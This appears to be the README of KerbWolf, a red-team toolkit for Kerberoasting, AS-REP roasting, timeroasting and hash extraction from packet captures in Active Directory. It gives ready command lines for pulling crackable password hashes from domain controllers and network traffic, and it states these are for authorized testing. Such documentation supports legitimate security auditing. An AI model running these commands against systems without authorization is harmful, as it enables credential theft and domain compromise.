Guide • Installation • Commands

Kerberos roasting and hash extraction toolkit for Active Directory.

1. Kerberos roasting - extract crackable hashes from Kerberos authentication
2. Timeroasting - unauthenticated MS-SNTP hash extraction for computer and gMSA accounts
3. Pcap extraction - offline Kerberos, NTLM, and SNTP hash extraction from network captures

Warning: This tool is intended for authorized security testing only. You must have explicit written permission from the system owner before attacking any Active Directory environment.

Request encrypted tickets from domain controllers and crack them offline. Supports all 5 Windows encryption types.

# Get a TGT
kw-tgt -d CORP.LOCAL --dc-ip 10.0.0.1 -u admin -p 'Password1!' -o admin.ccache

# Kerberoast via LDAP auto-discovery
kw-roast -k -c admin.ccache --ldap

# AS-REP Roast
kw-asrep -d CORP.LOCAL --dc-ip 10.0.0.1 -t jsmith

Features: LDAP enumeration, hashcat + John output, all 5 etypes (DES/RC4/AES128/AES256), ccache auto-detection, DNS SRV resolution, TCP/UDP with auto-fallback.

Extract password-equivalent hashes from domain controllers via MS-SNTP. No authentication needed - just a valid RID.

# Blind RID scan (no auth)
kw-timeroast 10.0.0.1 -r 500-5000 -o hashes.txt

# LDAP discovery + cracking wordlist
kw-timeroast 10.0.0.1 --ldap -d CORP.LOCAL -u admin -p 'Pass!' --wordlist crack.txt

Features: 68-byte MD5 (hashcat 31300) + 120-byte KDF+HMAC-SHA512, current/previous password selection, LDAP discovery of computer + gMSA accounts, cracking wordlist output.

Extract all crackable hashes from network captures. One tool, all protocols.

# Extract everything from a capture
kw-extract capture.pcap -o hashes.txt

# Pipe from tcpdump
tcpdump -i eth0 -w - 'port 88 or port 123 or port 445' | kw-extract -

Kerberos (port 88): AS-REQ pre-auth timestamps, AS-REP encrypted parts, TGS-REP service tickets. All 5 etypes, 15 hash formats.

SNTP (port 123): 68-byte MD5 and 120-byte KDF+HMAC-SHA512 timeroast responses.

NTLM (8 transports): Extracts NTLMv1, NTLMv1-ESS, NTLMv2, and LMv2 hashes with automatic TCP stream reassembly and Type 2/Type 3 connection tracking.

Numbers in parentheses are hashcat mode numbers. The 9 RC4/AES modes work in hashcat and John today.

pip install .
# or
uv tool install .

See the installation guide for development setup and dependencies.

git clone https://github.com/StrongWind1/KerbWolf.git
cd kerbwolf
uv sync                        # install dev dependencies
make check                     # run lint + typecheck + tests
make docs                      # build documentation
make format                    # auto-fix formatting
make build                     # build wheel (runs check + docs first)

KerbWolf is intended for authorized penetration testing, red team engagements, and security audits only. You must have explicit written permission from the system owner before attacking any Active Directory environment. Unauthorized access to computer systems is illegal. The authors are not responsible for any misuse or damage caused by this tool.

Built on Impacket and ldap3. Inspired by Rubeus, GetUserSPNs.py, and hashcat.

Apache License 2.0